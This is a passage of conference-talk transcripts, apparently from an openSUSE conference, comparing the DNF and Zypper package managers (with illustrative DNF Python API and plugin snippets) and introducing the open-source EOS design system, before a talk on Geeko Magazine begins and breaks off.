way through Fedora 28; after that, not so much. So, some of the similarities, because there are of course similarities between the two. They both use libsolv for dependency resolution. The low-level aspects of both package managers are in C and C++. Plugins are supported in the base library interfaces, and they both work with PackageKit — so anything that leverages PackageKit on distributions using DNF or Zypper will be able to use those backends correctly. They exclusively handle RPM-MD metadata repositories — technically this wasn't true in the past, because Zypper used to handle YaST repos, but it doesn't anymore; it silently pretends YaST repos don't exist and uses RPM-MD repos instead. And both of them support fairly well building custom front-end interfaces, and of course arbitrary subcommands, through extension with Python modules or C++ programs or whatnot. The user experience between the two is actually fairly similar as well: the CLI interface structure is the same — it's the tool, with the action, with the arguments for the action.
Subcommands in both DNF and Zypper have standard abbreviated forms. This is something some people may not be familiar with: in DNF they've adopted the same technique as the Zypper people, where common subcommands have a short form that's easier to type and remember, so you don't necessarily need bash completion to get to them. And of course the CLI supports colors when the terminal supports it, which helps you distinguish things when colors are activated. There are graphical front-ends offering more intuitive, user-friendly ways to do software management as well, of course. But there are a fair number of differences, too. The underlying differences between the DNF and Zypper stacks are actually quite significant. The biggest one is that the underlying architecture of the DNF stack is very modular: it is split across five or six libraries if we exclude librpm itself and libsolv, whereas the Zypper stack is one library once you exclude those. One thing that's a little bit scary and surprising is that Zypper actually installs packages by subprocessing out to the rpm command. From what I understand, in eons gone by they couldn't trust librpm to do the right thing, so they subprocess it and do scary things to make sure everything looks like it worked. DNF, however, has no such compunction and uses librpm to install things directly — the transaction is handled by RPM through the library interface and doesn't look quite as terrifying from the 10,000-foot view. The way you install collections of packages is slightly different between DNF and Zypper because of comps groups and now the new module metadata stuff. Fedora has this new modularity thing, which has a new extra metadata format with more stuff in it — it's kind of complicated, but it adds more ways for DNF to handle collections of packages — whereas Zypper of course has patterns, which, as you're all familiar with, are basically very fancy meta-packages with extra properties attached so that Zypper knows how to find them. One thing that was actually kind of surprising when I first started comparing the two stacks years ago was that language bindings in the Zypper stack are in a pretty poor state: the zypp-bindings project is not in good shape and is essentially unsupported — they don't work. In the DNF stack, as a consequence of how the front-ends are implemented and some of the legacy language bindings in the libraries, bindings are actually a first-class citizen, and while only Python is currently supported, more languages are expected to follow in the near future. DNF also exports the API as a D-Bus interface for applications to interrogate and manipulate through that route if they wish. As far as I'm aware, only YUM, DNF and APT have some form of this — not very many package managers have a direct way to be interrogated via D-Bus. The user experience is somewhat different as well, but not too much so. DNF has the feature of aliases, which it inherits from YUM, so you can define subcommands that are built on standard commands with options and things like that, to make custom short forms of whatever you want.
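As a hedged illustration of those Python bindings being a first-class citizen, a minimal script against the DNF API might look roughly like this (API names as I remember them from DNF 4 — treat it as a sketch, not an official example, and note that actually running a transaction requires root):

import dnf

# Set up a Base object, load the enabled repos and their metadata.
base = dnf.Base()
base.read_all_repos()
base.fill_sack()

# Query available packages, e.g. everything named "zypper".
query = base.sack.query().available().filter(name="zypper")
for pkg in query:
    print(pkg.name, pkg.evr, pkg.reponame)

# The same object can drive a transaction: mark, resolve, download, run.
base.install("hello")
base.resolve()
base.download_packages(base.transaction.install_set)
base.do_transaction()

This is essentially the interface that tools like Salt and Ansible talk to when they poke DNF directly.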
Back to the differences: another thing DNF does differently from Zypper is that you can install any package based on any file path known by the repository, because DNF parses the file lists completely and handles them in its solver pool, whereas Zypper does not normally do that. And there are multiple native graphical front-ends. Zypper, to its credit, strangely enough has a machine-readable XML output form, so its output can be processed by other tools through shell scripts, awk, perl and the like. One really neat thing it does is that it can split transactions up into smaller chunks if it detects a low-disk situation, or if there's a special solver situation that requires splitting the transaction. That is really handy when you're working with laptops with small SSDs, or netbooks and things like that — a really nice fancy feature to have. Unfortunately, YaST is the only graphical front-end that exists for it. YaST is cool and all, but the fact that there isn't an independent front-end that just works on its own makes it a little difficult to demonstrate how to use the libzypp API for building such things. So, yeah. As far as the ecosystem goes, we can start with the development activity of the actual package manager software itself — as soon as that shows up; there we go. For DNF and Zypper, the two graphs at the top are the command-line front-ends. You can see that the DNF one starts in 2002; that's because it was forked from YUM, so everything from 2012 and earlier is all YUM code, and forward of that is DNF. And for Zypper you can see that, by comparison, there isn't a whole lot going on in CLI land. That's because, unlike in DNF's stack, the CLI doesn't actually have a whole lot of logic in it — most of it is in the library. So you can see that, comparatively, libzypp has a lot more code going on in there, whereas on the DNF side it's a bit mixed: there's a lot of business logic in both the CLI front-end and the libraries — something that will hopefully be fixed over time. In terms of how the ecosystem uses this: the plugins and extensions model is very well supported in DNF, and I think it has been a really good boost to how DNF is used, because now that the API is stabilized and well defined, a lot of plugins and extensions have been written to support interesting workflows and tools. There are over 25 officially supported plugins off the top of my head, I know of at least a dozen more that people have written and are using, and then there are things like Salt and Ansible, which poke the DNF API directly because they can and they know that stuff is going to work — which lets them do more creative things when they need to. For Zypper, I'm actually not certain that many plugins were ever written for it. I could only really find a few major ones, like the one for Spacewalk / SUSE Manager and the SUSE Customer Center package-search plugin; I couldn't really find many others. The methods for supporting plugins and extensions don't seem to be well documented or pointed out anywhere, which is a little curious, because from what I could tell it is supposed to be capable of it.
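For a flavor of what writing against that plugin architecture looks like, here is a skeleton DNF plugin — hook names from the dnf.Plugin base class as I recall them; treat it as a hedged sketch rather than a polished example:

import dnf

class HelloPlugin(dnf.Plugin):
    # Name under which the plugin is registered and configured.
    name = "hello"

    def __init__(self, base, cli):
        super().__init__(base, cli)

    def resolved(self):
        # Called once the transaction has been resolved.
        print("hello plugin: transaction resolved")

    def transaction(self):
        # Called after the transaction has run.
        print("hello plugin: transaction finished")

Dropped into the plugin path and enabled in the configuration, hooks like these are what the 25-plus official plugins build on.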
That capability just isn't used, which I'm a little weirded out about. But, as I mentioned earlier, there are also graphical front ends for the DNF stack — several of them — because, of course, the CLI is scary. Aside from the PackageKit front ends, like GNOME Software and Plasma Discover, there are a few native front ends. The first was Yumex-DNF, the Yum Extender flavor for DNF; that project is now defunct and has been superseded by dnfdragora, which comes from the Mageia project, and SimpleDNF, which is made by an independent developer who wanted a much simpler GTK-based front end — I think it's brand new, I only found it a couple of weeks ago. So let me show you a little bit of that with the DNF tools. Let's see here. Oh, come on, don't do this to me now. Fine, let me kill this, and then let's go over here and start this. Okay, there we go. I pre-loaded a transaction here to show. Let's make this a little simpler. Whoa, that is not what I wanted. Oh, I see what is going on here. What you see over here is that I'm about to execute a transaction to do the equivalent of zypper dup on a Tumbleweed system. I already pre-downloaded the whole transaction because it took about seven hours in my hotel room to download everything, and I didn't want to trust the Wi-Fi. I should also kill the test-transaction part. I'm also using a short form here, dsync; if I wanted to be super clever, I'd just use dup. So: dup. That shows everything that's going to happen — it's going to install 160 packages, upgrade about 1.5K of them, remove and downgrade a few, do its thing. Everything is already downloaded, so it's going to run a transaction check and actually do it. Meanwhile, over here I have dnfdragora set up to install some things: I've checked a few packages, then build transaction — this is why you don't do demos. Let's see here. There we go, now it shows all the stuff. This is basically the same kind of output you'd see from the CLI, or, if you're familiar with YaST, you'll see something like this when it's about to propose a transaction to you. It's just going to make me type in my password again, and now it's going to download — wow, the Wi-Fi works here — so it's downloading packages and will do its thing while that's happening. Over here you can see it's doing basically the same thing: upgrading the packages, running through the scriptlets and so on. Something I learned while doing this: we run a lot of scriptlets during an upgrade in openSUSE. Like, a lot. Far more than I expected to. But it was an interesting exercise, because it showed that openSUSE does do things the right way: even swapping from Zypper to DNF, things work fairly well. You can see all the output; it does all the right ordering and installation. Nothing too special or crazy. Actually, this virtual machine has been upgraded three times using DNF rather than Zypper, and nothing has exploded so far. So we'll just go back to this. Beach ball of doom.
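For reference, here is a rough, hedged sketch of what that demoed full upgrade looks like when driven through DNF's Python API instead of the CLI. `upgrade_all()` is used as an approximation of the `dsync`/`dup` run shown above (the real distro-sync also downgrades packages to match the repositories exactly), and it of course needs root.

```python
# Sketch: approximate the demoed full upgrade via the DNF Python API.
import dnf

base = dnf.Base()
base.read_all_repos()
base.fill_sack()

base.upgrade_all()                    # mark every installed package for upgrade
base.resolve()                        # run the libsolv depsolver

to_fetch = base.transaction.install_set
print(f"{len(to_fetch)} packages in the transaction")

base.download_packages(to_fetch)      # fetch RPMs (a no-op if already cached)
base.do_transaction()                 # hand the transaction to librpm directly
base.close()
```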
All right — since the demo shows what was going on in there, here are the conclusions I came to. The DNF package manager and the Zypper package manager are actually fairly comparable at this point. In terms of user experience, performance, and usability they're pretty close to each other, and they're pretty good as package managers as a whole. I was a little disappointed when I looked at how the sausage is made for Zypper — how some of the stuff actually works inside. Maybe that's partly because ZYpp is so much older and they trusted the underlying stack a lot less, but there are some weird hacks in there that I feel somebody should take a second look at; maybe they're no longer needed. Another thing: it feels like somebody needs to care about developing a little community around it. Zypper is a perfectly serviceable package manager and a totally good replacement for a lot of subpar package managers in the RPM ecosystem, but there doesn't seem to be much attempt to really drive adoption or usage of it. Supporting plugins and extensions is hard, and ZYpp is — well, fill in your own word, but I would say ZYpp is pretty awesome. On the DNF side, the architecture is kind of complicated; it's a little hard to follow how all the pieces fit together. On the flip side, I think the community is pretty strong — maybe that's partly my fault — and a large number of people are actually using it, building tools around it, and doing things like that. Language binding support beyond Python is still missing. And I think the takeaway is that DNF makes YUM really not suck: it has a good CLI interface, the performance is pretty good, the extensibility is awesome, and generally I enjoy it. It's not that I want to say I love working with my packages all the time, but it doesn't make dealing with them a chore. In summary, I guess Zypper is probably still slightly higher up there than DNF, but I think there's potential both ways. There's still a bunch to learn from both of them; DNF does certain things a little better than Zypper and vice versa, as I mentioned earlier. Questions? Okay. Yeah. So the question was — to simplify it — is there an RPM-based package manager that does source-to-binary reproducibility for verification before installation? The answer is no. One, that is extremely expensive: it requires setting up build roots or, worse, installing all the build dependencies on the computer before building, then installing the real package at the end, and then probably figuring out a way to track all the build dependencies so you can remove them afterwards because you don't need them. Two, it's not strictly necessary most of the time. Most people who are building RPMs are hopefully using a build system that's worth a damn, like OBS or Koji, which provides source-to-binary guarantees and reproducibility and makes sure you're not doing dumb things in your packages. And usually the repository metadata can be verified to ensure it hasn't been tampered with, through checksums, metalinks, GPG checks, or a combination of those. From there you can usually trace to the binary package, check its checksum and signature, and then install it.
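Here is a small sketch of the checksum half of that verification chain — comparing a downloaded RPM against the digest published in (GPG-signed) repository metadata. The expected digest and the file path below are hypothetical placeholders, not real values; the GPG side is normally delegated to rpm itself rather than re-implemented in the front end.

```python
# Sketch: verify a downloaded package against a digest from signed repo metadata.
import hashlib

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream the file so large RPMs never have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

expected = "0123abcd..."  # hypothetical value taken from the repo's primary metadata
actual = sha256_of("/var/cache/example/vim-enhanced.rpm")  # hypothetical path
print("checksum ok" if actual == expected else "checksum MISMATCH")

# Signature checking is usually left to rpm, e.g. `rpmkeys --checksig <pkg>`.
```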
So you have enough verification paths that it's usually not necessary to go the extra mile of rebuilding and then installing just to verify reproducibility; that's the kind of thing you'd want to do server-side in a build farm, like an OBS or Koji setup. But there are bits and pieces of that functionality in both package managers. Zypper has a source-install function, which lets you point it at a source RPM; it will read it, install all the build dependencies, and unpack it into an rpmbuild directory, so you can go ahead and build the package yourself if you'd like. DNF has the builddep subcommand, which reads a spec file or a source package and installs the build dependencies, and then you can do whatever you want — but it doesn't have an equivalent of the source-install functionality. It might get one someday, but right now it doesn't. That's about as close as you get. Other package managers, like urpmi — the "user RPM" tool from Mandriva — can download and unpack just like Zypper does. APT-RPM doesn't have any of this functionality; it really tries to ignore the fact that source packages exist. And poldek and the others are just kind of waffly about what to do with this sort of thing. So it's not really something a lot of the RPM package managers concern themselves with. Yeah? You mean group installation as in installing to a bunch of computers with one command, or installing a bunch of packages? The latter. Okay, group installation in the sense of installing a bunch of packages. In the DNF stack you have this through composition groups — comps groups, as a lot of people call them — and now also through modulemd, the module metadata. Those are essentially metadata files that describe a set of packages belonging to a specific role, type, or some logical grouping that a user may want to act upon: install them, remove them, upgrade them together, that kind of thing. Zypper has similar behavior with patterns. It treats metapackages slightly differently in pattern mode and tries to accomplish the same behavior. It used to be that patterns were special metadata, like comps groups are; nowadays they are just metapackages with fancy labels and properties inside. Essentially both package managers provide that kind of functionality: for Zypper it's zypper install -t pattern <name of pattern>, and for DNF it's dnf install @<name of group or module>, and it will go ahead and install the collection of packages together. And it tracks those collections as they are installed, uninstalled, upgraded and so on, so you will know whether a package was installed as part of a group or individually. Yeah? Good question. The question was: does DNF have any special behavior for handling the case where a user explicitly removes a weakly installed package — one that was pulled in by a weak dependency? The answer, unfortunately, is no right now. However, because DNF tracks the reason a package was installed and already has the information to make these kinds of decisions, the only reason it doesn't do things like automatically excluding a weakly installed package that a user has explicitly removed is that no one has written the logic to do that.
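To put the group/pattern and build-dependency commands mentioned earlier in this answer side by side, here is a short hedged sketch in script form. The pattern, group, and package names are placeholders; the zypper `-d` flag limits source-install to build dependencies only; and `dnf builddep` comes from the dnf-plugins-core package, so it may need installing first.

```python
# Sketch: the CLI equivalents for collections and build dependencies, scripted.
import subprocess

def run(cmd):
    print("+", " ".join(cmd))
    subprocess.run(cmd, check=True)  # both tools need root privileges

# Install a collection of packages (pattern vs. comps group/module):
run(["zypper", "--non-interactive", "install", "-t", "pattern", "lamp_server"])
run(["dnf", "-y", "install", "@development-tools"])

# Pull in build dependencies for a source package or spec file:
run(["zypper", "--non-interactive", "source-install", "-d", "vim"])
run(["dnf", "-y", "builddep", "vim.spec"])
```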
For that weak-dependency case, all the pieces are there; the filter just isn't wired up yet. There was an effort a couple of years ago to redo how DNF stores its reason information. They now call it the software database; it used to be a descendant of the YUM database. It's essentially a database that tracks every transaction that has ever happened and also records how packages were installed and why. When a user decides "I don't want this anymore" and uninstalls something, that reason is recorded as well. Those reasons are currently not fully factored into the dependency solving, but they could be, and if they were, you could get more intelligent results out of it. Hello. You talked about DNF's module functions — does it support any higher-level functions, for example dependencies between modules or comps, or registering enterprise modules? Yeah, it does. Modules export the same level of interfaces and manipulation APIs that packages do, so you can install, remove, update, and query them, and modules can have module-level dependencies. The way the module stuff works is as a kind of layering: you start with a repository layer at the bottom, which has a soup of packages; then you have modulemd documents saying that these buckets of packages belong together; and then the packages inside those buckets are handled. It goes all the way down layer by layer, and DNF basically handles each layer as if it were a package, so you can perform actions on them and things like that. Okay — so are those resolved using libsolv? Unfortunately, libsolv knows nothing about them right now. Part of this is because a lot of the behaviors related specifically to modules are not fleshed out enough for us to figure out how they should work in libsolv. It would be unfair to everybody if we implemented it once and then it turned out six months later that we had to change everything again. We want a solid idea of how it's supposed to behave across the board before we make libsolv fully aware of modules. For now, from libsolv's point of view, it looks like DNF is saying "I want to disable all these packages", or "I want to enable all these packages; these are in these filter groups; these are higher priority" — but libsolv doesn't know why. Can you do anything like enterprise registration of RHEL using DNF via a plugin? Yeah — the subscription management functionality has been integrated into the lower levels. For example, Red Hat subscription management now has a C library, librhsm, which is plugged into the libdnf library as a plugin. So if you are on a RHEL system, that plugin is built in; it will track your entitlement status and regenerate the redhat.repo file on the system to include the repositories you are entitled to. The subscription-manager tool from Candlepin is what manipulates the settings for that, and that's a Python program that lives a little bit outside of it, but it also wires into the DNF front end through its Python API to make sure those things stay coherent.
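As a hedged aside on the reason tracking described above, these are the stable CLI entry points for inspecting and changing a package's recorded install reason today; the package name below is just a placeholder, and this is generic DNF usage rather than anything specific to the talk.

```python
# Sketch: inspect and flip install "reasons" recorded in DNF's software database.
import subprocess

def dnf(*args) -> str:
    return subprocess.run(["dnf", *args], capture_output=True, text=True).stdout

# Everything the software database considers explicitly user-installed:
print(dnf("history", "userinstalled"))

# Treat a package as a dependency again (so it becomes a candidate for
# autoremove), or pin it back as user-installed:
subprocess.run(["dnf", "mark", "remove", "vim-enhanced"], check=True)
subprocess.run(["dnf", "mark", "install", "vim-enhanced"], check=True)
```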
That subscription-management integration should be done a bit more smoothly, but that takes some work to figure out how the interactions between the package manager and the entitlement management system need to be rationalized, especially around handling the transition from talking to RHSM directly to switching over to a Satellite system, or a SUMA (SUSE Manager) system, or something like that. Any other questions? Okay. Well.
In one corner, we have Zypper: the successor to the motley of package management options from Ximian and SuSE. Created after the merger of the Ximian and YaST package manager teams, it was a pioneer in using the SAT solver for package management and proved that it worked well at scale in a large and popular Linux distribution platform (SUSE Linux). It spawned the development of libsatsolver, which became libsolv. Considered by many to be the most advanced and fastest package manager, it created a class of package managers all its own. It is used in openSUSE, but is also available in Fedora and other RPM-based Linux distributions. In the other corner, we have DNF: the anointed successor to YUM (Yellowdog Updater, Modified). DNF (Dandified YUM) was forked from YUM to rework the internals to leverage libsolv and offer a saner, more maintainable API. Forged from the blood, sweat, and tears of many package manager developers from Red Hat and others, DNF is built with the lessons of the last decade of software and systems management experience in mind. A new up-and-comer, it is used in Fedora, Mageia, OpenMandriva, Yocto, and others. It is also available in openSUSE. How do these two package managers compare? Are they more similar than different? Has DNF made YUM no longer a trash heap? Does ZYpp still rule the roost? This talk explores both package managers and compares them from a technical, usability, and ecosystem perspective. Who knows? Perhaps there are lessons still to be learned for evolving both package managers.
10.5446/54404 (DOI)
to start. Okay, hello, everyone. There are a lot of people still coming, so we can start in 30 seconds, actually. Welcome to the openSUSE conference. This is a very new project in the openSUSE world, which is why we are introducing it to the world here. Hello. Hi. Yes. So, welcome to this presentation. As Cynthia said, we're going to introduce ourselves first; it's the first time we present this to the world. Let me introduce myself: I'm Jesus, UX developer and scrum master for the EOS design system team. I live in Barcelona — I was going to make a joke about the weather, Barcelona being very sunny and here not, but it's super sunny here today, so no jokes. I work designing and developing components for the design system that ensure that products at SUSE, and other open source products, have coherent user experiences. My name is Cynthia. I've worked for SUSE for almost six years, and I actually started this project of creating a design system for SUSE. I'm the product owner of the EOS design system; I'm also a front-end developer and UX designer — I do a lot of things here and there. Today we want to take you on a little journey so you understand how we came to see that design systems are the solution to providing good experiences to our customers. "Software is eating the world" — that's a phrase that was published in the Wall Street Journal in 2011, and it made a lot of noise at the time, because our industry had to start adapting and understanding that software was becoming a core part of our lives. Today that phrase is simply reality: without software we cannot do our daily tasks, or even work at all. One of the things happening when that phrase was published was that Blockbuster was collapsing and Netflix was eating Blockbuster — the industry was really being disrupted, and it happened. But something else is happening right now: design is eating software development. At the same time there are other revolutions out there — one could say virtual reality is eating software development, or augmented reality is eating software development. A lot of things are disrupting the way we build software today, but today we'll focus on design. Why? Because a lot of companies, and the industry in general, have realized that in order to make better software, we have to provide better experiences, and design and user experience help us deliver products with a good quality of experience to our consumers. A lot of companies in the consumer world have understood this and are investing a lot of money into creating better experiences — to mention a few: Facebook, Uber, Airbnb, and so on. One example: Facebook is one of the biggest content databases in the world, yet they don't actually create anything — the consumers are creating it for them.
And that's because software, and the experiences it provides, allow them to gather all that information. The same goes for everyone else. And this is another reality. This is a two-year-old, and this is a video the father made showing the kid trying to zoom into an image. The video went very viral; it was seen everywhere. The thing is, we have to pick up the pace a little with this revolution — with how we enhance experiences and make our products better. There have been many generations, and every generation is known for different things. For example, millennials are known for being very good at multitasking, and we understand processes maybe in a different way than the baby boomers, the previous generation, did. But this new generation — Generation Z, as it's called — was born with all the software we have today. And there's another essential thing here: when you create and design software, you have to fulfill user expectations. The more we use software, the more we get used to certain patterns, and the more we expect to see the same experiences from one product to the next. Google Maps has a certain way of showing us directions; if you use another product to get directions to this conference, you kind of expect the same patterns and experiences. That's because these experiences, these interfaces, are wiring your brain — they get into you. And like I said before, there's a new generation coming, and we should never forget the new generations: they disrupt our markets, they disrupt the way we do things, and we should pay close attention to the one that's coming. It's not so far away from us — if we consider people born in 1996, they're 21 years old, more or less, they're already among us, and with these interfaces they may already be more experienced than we are. It's true: we have to understand that young people may sometimes know things better than we do. So we have to invest in user experience; we have to improve the way we deliver experiences to our customers. But then, okay, maybe it's not so hard to accept that we have to deliver good experiences and good UIs in our applications — but there's another reality, and it came straight at us like a slap in the face. Oh, it's not playing. Yep. So we got this slap in the face: we are in a very specific industry, open source and enterprise software, and it works very differently from the companies I was showing before — Facebook, Uber, Google, Airbnb, anything consumer-oriented. They have priorities and prerogatives that we don't have. We often don't have the time to polish things; we have to ship as soon as we can so we don't lose customers. We have different customer bases as well — people who are more experienced — and sometimes we tend to think we don't have to deliver such good experiences or such good interfaces because they're experts and they know what they're doing. But that's not really the reality today. So that's how it was a long time ago.
One would say that enterprise and open source software was far, far behind in terms of user experience compared to consumer-oriented companies. Today the gap is closing. There are a lot of companies out there investing a lot of money; they have the money to hire thousands of designers and UX experts and all that. But there's also a better way to do this. Like I was saying, a lot of companies have the budget to hire people, but scaling design through hiring is not the only way to do it — you can also improve your processes. And this is why design systems are so hot right now, like it says here. I'm sure you've all heard at some point that a lot of companies are investing in design systems; we are one of them. So what is a design system? A design system is a centralized source of information. A lot of people tend to think that because it has the word "design" in it, it's for designers, but that's not really true: a design system helps developers and designers — and, to be really fair, it helps developers more than designers. It provides and delivers cohesive experiences. That's the whole point of a design system: it has all the tools you need to provide an experience that is consistent across your whole product portfolio. Let me show you a little scenario of a company with three products, and how it works without a design system and with one. This is more or less the setup of a company with a portfolio of different products. You will normally have a designer per product working with the developers directly. But then, as you see here — I made a very basic example with a close button — this is what happens in the end: you have groups of people working in isolation, and the outcome, the interface and experience for your consumers (because we always have to think about the consumer of the application), is different. We end up with the red, the black, and the blue button. It's a silly example, of course, but the bottom line is that growing inconsistency is more expensive to test, because we have to test each design of the same component for every product — it becomes expensive. It's non-collaborative, because every designer is working in isolation in a different way, and if you try to fix that — we tried — it's a lot more complicated and really frustrating for designers to try to align when you have different use cases, different products, and different agendas. And — something I was almost forgetting to say — it's non-reusable, which is one of the main wastes of money, I would say: the company creates something for one product, so why didn't we just reuse it in the other products? Maybe because the agendas were not the same, maybe because the use cases were not the same. With a design system, everything goes to the source first, and this is how we save money: we save development time, we save testing time. But what we really need to focus on is that the consumer gets the same experience in all of the products.
And like I said before, this also streamlines collaboration between designers and developers, and everything goes to the source. There's not so much to discuss, really: it has been tested and discussed before it goes into the product, so it's a lot of money and time saved. As for the structure of the design system, just so you have a rough idea: we have assets, icons, typography, components, templates, modules, guidelines — how we talk to our consumers, how our brand is interpreted by the consumer. And like I was saying before, this is not for one group or the other; it's not just for designers or just for developers, it's for both. What we normally get out of a design system is the components the developers need — normally just the front-end part, the back end is never included — and all of the design pieces, because designers also need to keep growing their products and the design system as well. Everything is in one place, and everything is tested in just one place. And now I'm going to hand over to my colleague. So, as Cynthia explained, a design system is a great way of breaking away from the silos, where we can't really ensure coherence between different teams in terms of UX and UI. But it's also true that developing a design system — oh, does this work? No. Oops, there you go — developing a design system takes time and money. There's a whole process of research and development behind a design system. Initially there's a step where components are defined, where we try to identify areas of our interfaces where we need to ensure that the interaction with our users is meaningful. Once we identify the issues we want to solve with the design system, there's a whole side of research where feedback is gathered, where we speak to our users, where we look at analytical data, and where we define the different elements that will compose the design system. And that translates into money — it's costly. It's clear to us that many open source projects, organizations, and small and medium-sized businesses probably don't have the resources, at the human and financial level, to build their own design system. And this is why — oh, okay, sorry. Then there's, of course, the whole issue of scalability. Say you're building your own design system: you want a set of rules that makes sense for your interfaces and breaks away from those silos. But then your interfaces evolve, new features are added, you may pivot the whole purpose of your project, and that means revising your design system again, going through it and making sure you don't define components redundantly, that everything stays reusable. And that's something you need resources for, to be able to handle and maintain the design system — and many organizations don't have those resources. So why did we build EOS? What's the reasoning behind it? We want to build a design system that's customizable, which means you can just go to our repository, clone or fork it, and easily apply your brand to it — your project, your colors, whatever. The idea is that it's easy for anybody to customize. We want it to be scalable.
We want to be able to add features to it easily. And we, of course, want it to be open source, which to us is what makes it different from other design systems: our idea is to be the first open source, customizable design system. We use open source technologies on a daily basis — I think we all do — and for us at EOS it's important that we give back to the community and encourage everybody to collaborate and help develop an open design system. We strongly believe that UX is for everybody, not just big enterprises. As Cynthia mentioned before, there are big enterprises with massive amounts of resources and tons of designers and developers working on a design system, but that's not the case for the majority of us. We want good UX for open source: whatever project you may be working on, you can just leverage the EOS design system. We also want to encourage you to go beyond the framework. What do we mean by this? Usually, if you build a web interface, you use frameworks such as Bootstrap, which already provide you with a set of components and UI elements. But what they don't give you is an understanding of how to use those components, how to interact with your user, what works, what doesn't, how you communicate with your user. That's what actually makes a design system different — that's its added value. I'm sorry, apologies. And of course, as I said before, we want it to be open to everybody. We think there's a lot to give, and a lot of feedback to take from the community, and that's why we already have contributors on the project; we take feedback from them and collaborate closely with them. So, what have we done so far? How far did we get with this? We are at the early stage of customization. What do I mean by that? EOS is the design system for SUSE, and its main purpose initially was to ensure coherence and consistency between SUSE products. As in the example Cynthia gave before, if you have different silos, different teams that each develop a button, it translates into different styles of buttons for products that are actually from the same company. That's something we managed to solve. Then we wanted to prove that EOS is customizable, and this is how we also deployed the openSUSE design system: basically a fork of EOS, but with openSUSE branding. The proof of concept is there; we proved it can be done — you can just customize the design system for your needs. Now the idea is to take this beyond proof of concept. We want to be able to customize it completely, which means adding a content management system, for example, so that once you start using EOS as your design system, you can easily add new components to it, and it also becomes accessible to designers and everybody else who works with it. And what does it look like? I'm going to do a quick demo now and show you a couple of components, but I encourage you to also visit this URL. This is the EOS design system — let's say the main design system — and then, of course, we also have the openSUSE flavor of it. Okay, so — let me just leave this here. I'm going to demo EOS, mainly because this is where, let's say, we work on the different features.
And I'm going to give you a few examples of how it works and what makes it different from a framework like Bootstrap. I think a good example would be alerts. Many UI frameworks come with these components — you have alerts defined, how they look, their states, and so on — but what they don't do is tell you how to use them, where to use them, and make you aware of the different contexts where you can use them so that the interaction with your user is meaningful. An example: there are different alert types. There's a global alert, which appears at the top of your web application. And what you see is that there's always a short description of how to use them, what kinds of actions they can include, whether they can be dismissible or not — things that actually matter depending on the context of each scenario. And then, of course, you see that we're using Bootstrap as a base, so this isn't a standalone UI framework; the idea is that, using Bootstrap, you can simply copy the example and add it straight to your application. And — something I almost forgot — these are code examples, but at the same time there are also specifications for them. The idea is that this is used not only by developers but also by designers, so in the end you have a full set of specifications, all the information you need to implement these elements in your interface. Let me give you another example, if I can. It's not all about design; it's also about things like how we communicate with our users. For example, we have writing guides. What are those? When you have an interface that speaks to the user — say an error in a pop-up, or any kind of message you send to the user — it's important to define a voice. Are you knowledgeable? Are you too aggressive when you speak to your user? What these guides provide is a set of definitions of how, in this case for SUSE, you should sound when you speak to your user. This is something we researched; we spoke to different teams, and this is the outcome. So, for example, what we defined is: we are experts, not too bossy; we're friendly, but not informal. That's the idea. Once you define your voice, it's also about the tone. And then we have conventions and rules — you can drill down to things like acronyms and how to use them. This is something we always work on closely with other sides of the product, for example branding and marketing, and the idea is that it's something you don't need to define for your own project, because it's already here. And it goes on and on; there are other great examples, and colors would be another one. Here we define the color palette, and we also give guidelines on how to use these colors.
What works in terms of contrast, for example. And this is great because it means you already have — in this case — variables for a CSS preprocessor, but you also get an idea of what works and what doesn't, so you don't end up with dark text over a dark background, for example. And then there's... should we show perhaps icons? We have only three minutes. So, yes, that would be it. Please, I encourage you to have a look — just access the links on the slides. Yeah, well, that's all for the presentation. I'm sure you've seen that the whole time we've had the links here, down in the footer. If you want to get in touch with us, if you want to try out what we have, you have the links there: eosdesignsystem.com — that's the URL. We have Twitter, and a lot of other channels. Just get in touch with us, with Jesus and myself, if you have any questions. But we really encourage you to collaborate with us, because we're not just building SUSE's design system, as many thought; this is open source, and we are also helping with the openSUSE design system. And we kind of need a little bit of help there, so the more help we can get, the better this product is going to become. I think that's it. Please come over to our table — we have some really nice stickers too, so please come and grab one. Thank you very much for coming. It wasn't so bad. Thank you. APPLAUSE We don't have time for questions, just so you know, because there's another talk starting right now. So if you have any questions, just come to our table. Yeah, thank you. Bye.
In the past UX design was a commodity in the paid consumer world, where companies like Facebook, Google, Uber would invest millions on. Today the gap is closing. Enterprise and Open Source applications are in need of better UX too. On the other hand, many companies of all different sizes struggle with today's IT agendas: bleeding edge software, agile development, short time-to-market, etc., and this "new" (and really not so) kid on the block is not making it any easier for developers and designers to keep up: UX design. Companies struggling in this scenario will eventually suffer from a big level of inconsistency in their products portfolio, and sometimes even in one same product. Design Systems can help solve this problem, and a few more. Design Systems serve as a centralized source of information for UX, UI, and other brand-related guidelines that help not only developers find the UI element or component they need, but also designers to build faster prototypes while streamlining the collaboration between the two. But, building a Design System can take a very long time and be very expensive, this is why we're building EOS: an Open Source and customizable Design System. In this presentation, we will talk more about the problem Design Systems solve, how we are building EOS, and how it can be of great benefit to your company or project.
10.5446/54405 (DOI)
Okay, good afternoon everyone. Thank you for coming. Today I'm talking about Geeko Magazine, which is a series of technical magazines about openSUSE, published by the Japan openSUSE User Group. Before starting, let me introduce myself. I'm Fuminobu Takeyama; my openSUSE ID is ftake, and, as you may have noticed, I'm from Japan. I'm one of the organizers of the Japan openSUSE User Group, which is a local Linux user group, so I often attend local conferences, run a booth, and talk about openSUSE. Since 2014 I've also been a member of the openSUSE.Asia Summit organizing committee, and in 2017 we had the openSUSE.Asia Summit in Tokyo, Japan, where I was the conference chair. So let me also advertise the next openSUSE.Asia Summit here: it will be held in Bali, Indonesia, and the important thing is that the call for papers is open until next month. Bali is a very good place to visit — a tropical resort area with many historical places. Also important: this photo was taken in 2016, the last time the openSUSE.Asia Summit was held in Indonesia. There is a big community there; about 500 people came to that summit, and the committee members are very enthusiastic and friendly. So I recommend visiting Indonesia and giving a talk at the conference. I'm also a package maintainer in openSUSE's M17N project, maintaining some input methods and packages related to fonts. By the way, I'm not working for SUSE — I'm a community developer. My daily job is working as a consultant at a Japanese IT infrastructure platform products company. So, today's topic is Geeko Magazine. Is there anyone who knows about Geeko Magazine? Thank you very much. Geeko Magazine is a technical magazine about openSUSE. It contains many technical articles related to openSUSE, and it also has some content like novels, which is not technical but is related to openSUSE — it's very fun. Here is one copy of Geeko Magazine. It is B5 size — the Japanese B5, which is between A5 and 